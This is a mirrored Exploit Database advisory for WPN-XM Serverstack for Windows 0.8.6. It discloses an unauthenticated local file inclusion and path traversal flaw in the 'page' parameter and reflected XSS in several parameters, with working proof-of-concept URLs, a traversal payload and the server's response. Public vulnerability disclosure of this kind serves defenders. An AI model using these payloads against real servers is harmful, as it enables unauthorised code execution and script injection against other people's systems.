WPN-XM Serverstack for Windows 0.8.6 – Multiple Vulnerabilities

• Exploit Database
• 97 阅读

• 作者： Rafael Pedrero
  日期： 2023-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51075/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  # Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2022-02-13 # Vendor Homepage: http://wpn-xm.org/ # Software Link : https://github.com/WPN-XM/WPN-XM/ # Tested Version: 0.8.6 # Tested on:Windows 10 using XAMPP   # Vulnerability Type: Local File Inclusion (LFI) & directory traversal (path traversal)   CVSS v3: 7.5 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CWE: CWE-829, CWE-22   Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows unauthenticated directory traversal and Local File Inclusion through the parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello (without php) GET request.   Proof of concept:   To detect: http://localhost/tools/webinterface/index.php?page=)   The parameter "page" can be modified and load a php file in the server.   Example, In C:\:hello.php with this content:   C:\>type hello.php <?php echo "HELLO FROM C:\\hello.php"; ?>     To Get hello.php in c:\ : http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello   Note: hello without ".php".   And you can see the PHP message into the browser at the start.   Response:   HELLO FROM C:\hello.php<!DOCTYPE html> <html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1">   <title>WP?-XM Server Stack for Windows - 0.8.6</title> <meta name="description" content="WP?-XM Server Stack for Windows - Webinterface."> <meta name="author" content="Jens-André Koch" /> <link rel="shortcut icon" href="https://www.exploit-db.com/exploits/51075/favicon.ico" />       # Vulnerability Type: reflected Cross-Site Scripting (XSS)   CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79   Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /tools/webinterface/index.php, in multiple parameters.   Proof of concept:   http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E